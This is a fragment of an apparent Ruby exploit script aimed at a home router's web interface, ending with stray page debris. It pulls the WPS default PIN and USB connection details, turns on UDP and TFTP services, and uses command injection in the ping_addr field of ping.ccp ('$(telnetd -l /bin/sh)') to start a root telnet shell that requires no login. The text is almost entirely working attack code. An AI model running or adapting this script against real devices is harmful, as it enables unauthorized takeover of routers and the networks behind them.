"txt_parser", :path => "usb_connect.txt", }, { :name => "Get WPS default pin", :call => "txt_parser", :path => "wps_default_pin.txt", }, { :name => "Enable UDPServer", :call => "noop", :path => "test_mode.txt", }, { :name => "Enable TFTP service", :call => "noop", :path => "tftpd_ready.txt", }, { :name => "Enable telnet (root)", :call => "noop", :path => "ping.ccp", :post => { "ccp_act" => "ping_v6", "ping_addr" => "$(telnetd -l /bin/sh)" } } ] def noop(val) return end def sloppy_parser(slop) slop.split(/\<br \/\>/).each do |l| puts " #{l}" end end def txt_parser(txt) l = txt.gsub(/\=/, ': ') puts " #{l}" end # Iterate over all actions and attempt to execute. url = "http://#{options[:addr]}:#{options[:port]}" puts "[!] Attempting to extract information from #{url}" actions.each do |action| # Build the target URL and setup the HTTP client object. request = RestClient::Resource.new("#{url}/#{action[:path]}") # Fire the request and ensure a 200 OKAY. begin if action[:post] response = request.post(action[:post]) else response = request.get() end rescue puts "[!] Failed to query remote host." abort end if response.code != 200 puts "[-] '#{action[:name]}' failed with response: #{response.code}" next end # Send to the processor. puts "[*] #{action[:name]} request succeeded." send(action[:call], response.body()) end Source
×
×
  • Create New...